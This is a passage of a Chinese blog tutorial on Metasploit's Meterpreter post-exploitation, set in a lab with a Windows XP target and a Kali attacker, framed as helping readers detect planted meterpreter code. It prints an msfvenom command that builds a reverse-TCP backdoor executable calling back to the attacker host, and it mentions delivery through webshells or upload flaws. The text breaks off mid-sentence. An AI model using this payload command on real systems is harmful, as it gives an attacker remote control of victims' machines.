Meterpreter Post-Exploitation分析

零、简介

Metasploit是一款开源的安全漏洞检测利用工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,同时它也是黑客手中的利器,恶意攻击者可以利用它来生成恶意的二进制文件和恶意文档进行一系列的攻击行为。之前爆出的“永恒之蓝”漏洞更是有很多的恶意攻击者将msf与这一高危漏洞结合入侵了大量的机器。Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给攻击者一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时,攻击者必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理攻击者的会话,而Meterpreter则是攻击载荷和渗透攻击交互。本文主要通过对Meterpreter的Post-Exploitation进行分析,帮助我们怎样在计算中发现是否被植入恶意的meterpreter代码。

一、环境准备

被攻击主机:Windows xp sp3 (192.168.239.129)

攻击者主机:kali Linux (192.168.17.26)

二、前置知识

Post-Exploitation:攻陷目标中的某一台或者多台主机之后做的一些事情,包括但不限于:识别已经拿下主机的价值以及维持访问。主机对于攻击者来说是否具有一定的价值、具有多大的价值主要从以下两个个方面考虑:是否有敏感信息、数据,是否能够在后期的渗透中发挥价值。比如被攻陷的主机是否是组织中的关键人物、高层领导、系统管理员,被攻陷的主机是够能够尽可能的有内网不同网段的访问权限等等。

三、生成后门

(一)reverse_tcp

新版本的msf中已经由msfvenom取代了之前的msfpayload,所以这里我们用msfvenom来生成恶意文件。

msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.17.26 lport=9999 -f exe > /root/evil.exe

生成结束之后我们需要把这个后门传递到被攻陷的目标主机,实际中可能是通过webshell、上传漏洞、先导马等等。传递到目标主机之后直接运行既可以得到一个

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值